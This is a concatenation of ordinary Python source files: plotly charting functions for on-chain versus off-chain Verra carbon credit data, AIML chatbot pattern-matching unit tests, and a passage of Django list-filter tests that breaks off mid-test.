def verra_project(df_verra, df_verra_toucan):
df_verra_toucan_grouped = df_verra_toucan.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = df_verra_grouped.merge(df_verra_toucan_grouped, how='left', left_on="Project Type",
right_on='Project Type', suffixes=('', '_Toucan'))
df_verra_other_grouped['Quantity_Toucan'] = df_verra_other_grouped['Quantity_Toucan'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped['Quantity_Toucan']
df_verra_other_grouped['Type'] = 'Rest of Issued VCU'
df_verra_toucan_grouped['Type'] = 'Toucan Bridged Credit'
df_other_and_toucan = pd.concat(
[df_verra_toucan_grouped, df_verra_other_grouped]).reset_index()
fig = px.treemap(df_other_and_toucan, path=[px.Constant("All Projects"), 'Project Type', 'Type'], values='Quantity',
hover_data=['Type', 'Quantity'],
color_discrete_sequence=px.colors.qualitative.Antique,
height=480, title='')
fig.update_traces(textfont=dict(color='white'), textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
return fig
def historical_prices(token_cg_dict, df_prices):
fig = go.Figure()
for i in token_cg_dict.keys():
col_name = f"{i}_Price"
filtered_df = df_prices[~df_prices[col_name].isna()]
fig.add_trace(go.Scatter(x=filtered_df['Date'], y=filtered_df[col_name],
mode='lines',
name=i
)
)
fig.update_layout(height=360, font=dict(color='white'),
xaxis_title='Date', yaxis_title='Price',
paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, xaxis=dict(
showgrid=False), yaxis=dict(showgrid=False),
margin=dict(t=50, b=20, l=0, r=0),
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8))
return fig
def pool_retired_chart(token_cg_dict, df_pool_retired):
fig = go.Figure()
for i in token_cg_dict.keys():
pool_address = token_cg_dict[i]['address']
        filtered_df = df_pool_retired.copy()  # copy so the loop does not mutate the caller's dataframe
filtered_df[f'Quantity_{i}'] = filtered_df['Quantity']
filtered_df.loc[filtered_df['Pool'] !=
pool_address, f'Quantity_{i}'] = 0
filtered_df = filtered_df.sort_values(by="Date", ascending=True)
filtered_df[f'Quantity_{i}'] = filtered_df[f'Quantity_{i}'].cumsum()
fig.add_trace(go.Scatter(x=filtered_df['Date'], y=filtered_df[f'Quantity_{i}'],
mode='lines',
name=i,
stackgroup='one'
)
)
fig.update_layout(height=300, font=dict(color='white'),
xaxis_title='Date', yaxis_title='Quantity',
paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, xaxis=dict(
showgrid=False), yaxis=dict(showgrid=False),
margin=dict(t=20, b=20, l=0, r=0),
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8))
return fig
def tokenized_volume(bridges_info_dict):
fig = go.Figure()
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df.sort_values(by="Date", ascending=True)
df["Quantity"] = df["Quantity"].cumsum()
df['Type'] = f'{i} Bridged Credits'
fig.add_trace(go.Scatter(x=df['Date'], y=df['Quantity'],
mode='lines',
name=i,
stackgroup='one'
)
)
fig.update_layout(height=300, font=dict(color='white'),
xaxis_title='Date', yaxis_title='Quantity',
paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, xaxis=dict(
showgrid=False), yaxis=dict(showgrid=False),
margin=dict(t=20, b=20, l=0, r=0),
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8))
return fig
def on_vs_off_vintage(df_verra, bridges_info_dict):
df_verra = df_verra[df_verra["Vintage"] != "missing"]
df_verra_grouped = df_verra.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = pd.DataFrame()
dfs = []
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df[df["Vintage"] != "missing"]
df = df.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Bridged VCUs'
dfs.append(df)
if df_verra_other_grouped.empty:
df_verra_other_grouped = df_verra_grouped.merge(df, how='left', left_on="Vintage",
right_on='Vintage', suffixes=('', f"_{i}"))
else:
df_verra_other_grouped = df_verra_other_grouped.merge(df, how='left', left_on="Vintage",
right_on='Vintage', suffixes=('', f"_{i}"))
df_verra_other_grouped[f'Quantity_{i}'] = df_verra_other_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped[f'Quantity_{i}']
df_verra_other_grouped = df_verra_other_grouped[[
'Vintage', 'Quantity']]
df_verra_other_grouped['Type'] = 'Rest of Issued VCUs'
df_other_and_bridges = pd.concat(
dfs + [df_verra_other_grouped]).reset_index()
fig = px.bar(df_other_and_bridges, x="Vintage",
y="Quantity", color="Type", title="", height=300)
fig.update_traces(marker_line_width=0)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
legend=dict(title="", orientation="h", yanchor="bottom",
y=1.02, xanchor="right", x=1
),
margin=dict(t=80, b=20, l=0, r=0))
return fig
def on_vs_off_vintage_retired(df_verra_retired, retires_info_dict):
df_verra_retired = df_verra_retired[df_verra_retired["Vintage"] != "missing"]
df_verra_grouped = df_verra_retired.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
dfs = []
for i in retires_info_dict.keys():
df = retires_info_dict[i]["Dataframe"]
df = df[df["Vintage"] != "missing"]
df = df.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Retired VCUs'
dfs.append(df)
df_verra_grouped['Type'] = 'Off-Chain Retired VCUs'
df_other_and_bridges = pd.concat(
dfs + [df_verra_grouped]).reset_index()
fig = px.bar(df_other_and_bridges, x="Vintage",
y="Quantity", color="Type", title="", height=300)
fig.update_traces(marker_line_width=0)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
legend=dict(title="", orientation="h", yanchor="bottom",
y=1.02, xanchor="right", x=1
),
margin=dict(t=80, b=20, l=0, r=0))
return fig
def on_vs_off_map(df_verra, bridges_info_dict):
df_verra = df_verra[df_verra["Country"] != "missing"]
df_verra_grouped = df_verra.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped["Text_Bridges"] = ""
df_verra_grouped["Quantity_Bridges"] = 0
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df[df["Country"] != "missing"]
df = df.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Bridged VCUs'
df_verra_grouped = df_verra_grouped.merge(df, how='left', left_on="Country",
right_on='Country', suffixes=('', f"_{i}"))
df_verra_grouped[f'Quantity_{i}'] = df_verra_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_grouped["Quantity_Bridges"] = df_verra_grouped["Quantity_Bridges"] + \
df_verra_grouped[f'Quantity_{i}']
df_verra_grouped["Text_Bridges"] = df_verra_grouped["Text_Bridges"] + \
f'{i} Bridged VCUs = ' + \
df_verra_grouped[f'Quantity_{i}'].map(
'{:,.0f}'.format).astype(str) + '<br>'
df_verra_grouped["Percentage"] = ((df_verra_grouped["Quantity_Bridges"] /
df_verra_grouped['Quantity'])*100).round(decimals=4)
df_verra_grouped['text'] = df_verra_grouped['Country'] + '<br>' + '<br>' + \
df_verra_grouped["Text_Bridges"] + \
'Total Tokenized VCUs = ' + df_verra_grouped['Quantity_Bridges'].map('{:,.0f}'.format).astype(str) + \
'<br>' +\
'Verra Issued Credits = ' + df_verra_grouped['Quantity'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Percentage = ' + \
df_verra_grouped['Percentage'].astype(str) + '%' + '<br>'
df_verra_grouped = df_verra_grouped[df_verra_grouped["Country"] != ""].reset_index(
drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df_verra_grouped.Country.astype(str).unique()
if country != 'nan'})
df_verra_grouped['Country Code'] = [country_index[country]
for country in df_verra_grouped['Country']]
cut_bins = [-np.inf, 0, 2, 5, 10, 100]
bin_labels = ["0", "(0-2]", "(2-5]", "(5-10]", "(10-100]"]
df_verra_grouped["Percentage Bins"] = pd.cut(
df_verra_grouped["Percentage"], bins=cut_bins, labels=bin_labels)
df_verra_grouped = df_verra_grouped.sort_values(by=["Percentage"])
fig = px.choropleth(df_verra_grouped, locations="Country Code",
color="Percentage Bins",
hover_name='Country',
custom_data=['text'],
color_discrete_sequence=px.colors.sequential.Plasma_r,
height=300)
fig.update_traces(hovertemplate="%{customdata}")
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=20, b=20, l=0, r=0),
legend=dict(font=dict(size=8), tracegroupgap=0,
title=" Percentage <br> Tokenized Credits", y=0.5))
return fig
def on_vs_off_map_retired(df_verra_retired, retires_info_dict):
df_verra_retired = df_verra_retired[df_verra_retired["Country"] != "missing"]
df_verra_grouped = df_verra_retired.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped["Text_Retires"] = ""
df_verra_grouped["Quantity_Retires"] = 0
for i in retires_info_dict.keys():
df = retires_info_dict[i]["Dataframe"]
df = df[df["Country"] != "missing"]
df = df.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Retired VCUs'
df_verra_grouped = df_verra_grouped.merge(df, how='left', left_on="Country",
right_on='Country', suffixes=('', f"_{i}"))
df_verra_grouped[f'Quantity_{i}'] = df_verra_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_grouped["Quantity_Retires"] = df_verra_grouped["Quantity_Retires"] + \
df_verra_grouped[f'Quantity_{i}']
df_verra_grouped["Text_Retires"] = df_verra_grouped["Text_Retires"] + \
f'{i} Retired VCUs = ' + \
df_verra_grouped[f'Quantity_{i}'].map(
'{:,.0f}'.format).astype(str) + '<br>'
df_verra_grouped["Percentage"] = ((df_verra_grouped["Quantity_Retires"] /
(df_verra_grouped["Quantity_Retires"] +
df_verra_grouped['Quantity']))*100).round(decimals=4)
df_verra_grouped['text'] = df_verra_grouped['Country'] + '<br>' + '<br>' + \
df_verra_grouped["Text_Retires"] + \
'Total On-Chain Retired VCUs = ' + df_verra_grouped['Quantity_Retires'].map('{:,.0f}'.format).astype(str) + \
'<br>' +\
'Total Verra Retired Credits = ' + df_verra_grouped['Quantity'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Percentage = ' + \
df_verra_grouped['Percentage'].astype(str) + '%' + '<br>'
df_verra_grouped = df_verra_grouped[df_verra_grouped["Country"] != ""].reset_index(
drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df_verra_grouped.Country.astype(str).unique()
if country != 'nan'})
df_verra_grouped['Country Code'] = [country_index[country]
for country in df_verra_grouped['Country']]
cut_bins = [-np.inf, 0, 2, 5, 10, 100]
bin_labels = ["0", "(0-2]", "(2-5]", "(5-10]", "(10-100]"]
df_verra_grouped["Percentage Bins"] = pd.cut(
df_verra_grouped["Percentage"], bins=cut_bins, labels=bin_labels)
df_verra_grouped = df_verra_grouped.sort_values(by=["Percentage"])
fig = px.choropleth(df_verra_grouped, locations="Country Code",
color="Percentage Bins",
hover_name='Country',
custom_data=['text'],
color_discrete_sequence=px.colors.sequential.Plasma_r,
height=300)
fig.update_traces(hovertemplate="%{customdata}")
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=20, b=20, l=0, r=0),
legend=dict(font=dict(size=8), tracegroupgap=0,
title=" Percentage On-Chain <br> Retired Credits", y=0.5))
return fig
def on_vs_off_project(df_verra, bridges_info_dict):
df_verra = df_verra[df_verra["Project Type"] != "missing"]
df_verra_grouped = df_verra.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = pd.DataFrame()
dfs = []
colors = {}
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df[df["Project Type"] != "missing"]
df = df.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Bridged VCUs'
colors[f'{i} Bridged VCUs'] = '#00CC33'
dfs.append(df)
if df_verra_other_grouped.empty:
df_verra_other_grouped = df_verra_grouped.merge(df, how='left', left_on="Project Type",
right_on='Project Type', suffixes=('', f"_{i}"))
else:
df_verra_other_grouped = df_verra_other_grouped.merge(df, how='left', left_on="Project Type",
right_on='Project Type', suffixes=('', f"_{i}"))
df_verra_other_grouped[f'Quantity_{i}'] = df_verra_other_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped[f'Quantity_{i}']
df_verra_other_grouped = df_verra_other_grouped[[
'Project Type', 'Quantity']]
df_verra_other_grouped['Type'] = 'Rest of Issued VCUs'
colors['Rest of Issued VCUs'] = '#536C9C'
colors['(?)'] = '#6E6E6E'
df_other_and_bridges = pd.concat(
dfs + [df_verra_other_grouped]).reset_index()
fig = px.treemap(df_other_and_bridges, path=[px.Constant("All Projects"), 'Project Type', 'Type'],
values='Quantity',
color_discrete_map=colors,
# color_discrete_sequence=px.colors.qualitative.Antique,
color='Type',
hover_data=['Type', 'Quantity'],
height=480, title='')
fig.update_traces(textfont=dict(color='white'), textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
return fig
def on_vs_off_project_retired(df_verra_retired, retires_info_dict):
df_verra_retired = df_verra_retired[df_verra_retired["Project Type"] != "missing"]
df_verra_grouped = df_verra_retired.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
colors = {}
dfs = []
for i in retires_info_dict.keys():
df = retires_info_dict[i]["Dataframe"]
df = df[df["Project Type"] != "missing"]
df = df.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Retired VCUs'
colors[f'{i} Retired VCUs'] = '#00CC33'
dfs.append(df)
df_verra_grouped['Type'] = 'Off-Chain Retired VCUs'
colors['Off-Chain Retired VCUs'] = '#536C9C'
colors['(?)'] = '#6E6E6E'
df_other_and_bridges = pd.concat(
dfs + [df_verra_grouped]).reset_index()
fig = px.treemap(df_other_and_bridges, path=[px.Constant("All Projects"), 'Project Type', 'Type'],
values='Quantity',
color_discrete_map=colors,
# color_discrete_sequence=px.colors.qualitative.Antique,
color='Type',
hover_data=['Type', 'Quantity'],
height=480, title='')
fig.update_traces(textfont=dict(color='white'), textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
return fig
| 1cce22fc18f653d39af6242df7dccc3e6e1d951f | 7,964 | py | Python | test/programytest/aiml_tests/basics_tests/test_basic_aiml.py | motazsaad/fit-bot-fb-clt | 580477aa1ec91855b621d9ae276f2705962f6a87 | ["MIT"] | stars: 5 (2018-08-21 to 2018-09-01) | issues: 1 (2018-09-12) | forks: 5 (2018-08-21 to 2018-09-23) |
import unittest
import os
from programytest.client import TestClient
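# Tests for basic AIML pattern matching: exact phrases plus the one-or-more (*)
# and zero-or-more (#) wildcards in leading, trailing, and mid-pattern positions.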
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_storage(self):
super(BasicTestClient, self).load_storage()
self.add_default_stores()
self.add_categories_store([os.path.dirname(__file__)])
class BasicAIMLTests(unittest.TestCase):
def setUp(self):
client = BasicTestClient()
self._client_context = client.create_client_context("testid")
def test_basic_basic_text(self):
response = self._client_context.bot.ask_question(self._client_context, "NO RESPONSE")
self.assertEqual(response, '')
def test_basic_one_word(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO")
self.assertEqual(response, "HELLO, WORLD.")
def test_basic_two_words(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE")
self.assertEqual(response, "HOW ARE YOU.")
def test_basic_three_words(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE NOW")
self.assertEqual(response, "HOW ARE YOU NOW.")
def test_basic_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO YOU")
self.assertEqual(response, '')
def test_star_after_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "HI")
self.assertEqual(response, '')
def test_star_after_no_match_single(self):
response = self._client_context.bot.ask_question(self._client_context, "HI THERE")
self.assertEqual(response, "HI, HOW ARE YOU.")
def test_star_after_no_match_multiple(self):
response = self._client_context.bot.ask_question(self._client_context, "HI THERE MATE")
self.assertEqual(response, "HI, HOW ARE YOU.")
def test_star_before_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "HEY")
self.assertEqual(response, '')
def test_star_before_single(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL HEY")
self.assertEqual(response, "HEY, HOW ARE YOU.")
def test_star_before_multiple(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL NOW HEY")
self.assertEqual(response, "HEY, HOW ARE YOU.")
def test_star_before2(self):
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE HEY")
self.assertEqual(response, "HEY, HOW ARE YOU.")
def test_hash_after(self):
response = self._client_context.bot.ask_question(self._client_context, "HOWDY")
self.assertEqual(response, "HOWDY PARTNER.")
response = self._client_context.bot.ask_question(self._client_context, "HOWDY MATE")
self.assertEqual(response, "HOWDY PARTNER.")
response = self._client_context.bot.ask_question(self._client_context, "HOWDY THERE MATE")
self.assertEqual(response, "HOWDY PARTNER.")
def test_hash_before(self):
response = self._client_context.bot.ask_question(self._client_context, "YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
response = self._client_context.bot.ask_question(self._client_context, "HEY YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
response = self._client_context.bot.ask_question(self._client_context, "HEY NOW YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
response = self._client_context.bot.ask_question(self._client_context, "HELLO THERE YO")
self.assertEqual(response, "YO, HOW ARE YOU.")
def test_star_star_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "GOODBYE")
self.assertEqual(response, '')
def test_star_star_still_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "GOODBYE MATE")
self.assertEqual(response, '')
def test_star_star_match(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL GOODBYE MATE")
self.assertEqual(response, "BYE BYE.")
def test_star_hash_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "SEEYA")
self.assertEqual(response, '')
def test_star_hash_still_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "SEEYA MATE")
self.assertEqual(response, '')
def test_star_no_hash_match(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL SEEYA")
self.assertEqual(response, "BYE THE NOW.")
def test_star_hash_match(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL SEEYA MATE")
self.assertEqual(response, "BYE THE NOW.")
def test_hash_hash(self):
response = self._client_context.bot.ask_question(self._client_context, "LATER")
self.assertEqual(response, "LATERZ.")
response = self._client_context.bot.ask_question(self._client_context, "LATER MATE")
self.assertEqual(response, "LATERZ.")
response = self._client_context.bot.ask_question(self._client_context, "WELL LATER")
self.assertEqual(response, "LATERZ.")
response = self._client_context.bot.ask_question(self._client_context, "WELL LATER MATE")
self.assertEqual(response, "LATERZ.")
def test_hash_star_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "FAREWELL")
self.assertEqual(response, '')
def test_hash_star_hash_only(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL FAREWELL")
self.assertEqual(response, '')
def test_hash_star_no_hash_and_star(self):
response = self._client_context.bot.ask_question(self._client_context, "WELL FAREWELL MATE")
self.assertEqual(response, "UNTIL TOMORROW.")
def test_hash_star_hash_and_star(self):
response = self._client_context.bot.ask_question(self._client_context, "FAREWELL MATE")
self.assertEqual(response, "UNTIL TOMORROW.")
def test_hash_middle(self):
response = self._client_context.bot.ask_question(self._client_context, "MORNING MATE")
self.assertEqual(response, 'GOOD MORNING.')
response = self._client_context.bot.ask_question(self._client_context, "MORNING THERE MATE")
self.assertEqual(response, 'GOOD MORNING.')
response = self._client_context.bot.ask_question(self._client_context, "MORNING MY GOOD MATE")
self.assertEqual(response, 'GOOD MORNING.')
def test_hash_middle_with_extra(self):
response = self._client_context.bot.ask_question(self._client_context, "MORNING MATE AHOY")
self.assertEqual(response, '')
response = self._client_context.bot.ask_question(self._client_context, "MORNING MY MATE AHOY")
self.assertEqual(response, '')
def test_star_middle_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING CHUM")
self.assertEqual(response, '')
def test_star_middle_still_no_match(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING THERE CHUM HALLO")
self.assertEqual(response, '')
def test_star_middle_match_single(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING THERE CHUM")
self.assertEqual(response, 'GOOD EVENING.')
def test_star_middle_match_multi(self):
response = self._client_context.bot.ask_question(self._client_context, "EVENING THERE MY CHUM")
self.assertEqual(response, 'GOOD EVENING.')
| 1ce4073f3792db70c50b0d120861ef8ac9b590a2 | 18,789 | py | Python | cradmin_legacy/tests/viewhelpers/test_listfilter/django/single/test_select.py | appressoas/cradmin_legacy | b9d024299333dd04c87c1031bd5be5778aa7f1f1 | ["BSD-3-Clause"] | stars: null | issues: 17 (2018-03-07 to 2022-03-12) | forks: 1 (2018-07-23) |
from __future__ import unicode_literals
from cradmin_legacy.python2_compatibility import mock
from django.test import TestCase
from future import standard_library
from model_bakery import baker
from cradmin_legacy import datetimeutils
from cradmin_legacy.tests.viewhelpers.cradmin_viewhelpers_testapp.models import FilterTestModel
from cradmin_legacy.viewhelpers import listfilter
standard_library.install_aliases()
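# Tests for the single-select listfilter variants: Boolean, IsNotNull, the
# DateTime range presets (today/yesterday/last_seven_days/this_week/this_month/
# this_year), NullDateTime, and AbstractOrderBy ordering options.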
class TestBoolean(TestCase):
def test_no_value(self):
testfilter = listfilter.django.single.select.Boolean(slug='mycharfield')
testfilter.set_values(values=[])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='A testvalue')
emptyvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='')
nullvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield=None)
self.assertEqual(
{withvalue, emptyvalue, nullvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_invalid_value(self):
testfilter = listfilter.django.single.select.Boolean(slug='mycharfield')
testfilter.set_values(values=['invalidstuff'])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='A testvalue')
emptyvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield='')
nullvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mycharfield=None)
self.assertEqual(
{withvalue, emptyvalue, nullvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_false_booleanfield(self):
testfilter = listfilter.django.single.select.Boolean(slug='mybooleanfield')
testfilter.set_values(values=['false'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=True)
falsevalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=False)
self.assertEqual(
{falsevalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_true_booleanfield(self):
testfilter = listfilter.django.single.select.Boolean(slug='mybooleanfield')
testfilter.set_values(values=['true'])
truevalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=True)
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mybooleanfield=False)
self.assertEqual(
{truevalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestIsNotNull(TestCase):
def test_false(self):
testfilter = listfilter.django.single.select.IsNotNull(slug='myintnullfield')
testfilter.set_values(values=['false'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=10)
nullvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=None)
self.assertEqual(
{nullvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_true(self):
testfilter = listfilter.django.single.select.IsNotNull(slug='myintnullfield')
testfilter.set_values(values=['true'])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=10)
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=None)
self.assertEqual(
{withvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_true_zero(self):
testfilter = listfilter.django.single.select.IsNotNull(slug='myintnullfield')
testfilter.set_values(values=['true'])
withvalue = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=0)
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
myintnullfield=None)
self.assertEqual(
{withvalue},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestDateTime(TestCase):
def test_no_value(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=[])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel')
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_invalid_value(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['invalidstuff'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel')
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_today_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['today'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 2)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_today_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['today'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 1, 12, 30)):
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_yesterday_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['yesterday'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 10))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 12)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_yesterday_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['yesterday'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 10))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 11, 12, 30)):
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_last_seven_days_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['last_seven_days'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 2))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 1, 10, 12, 30)):
self.assertFalse(
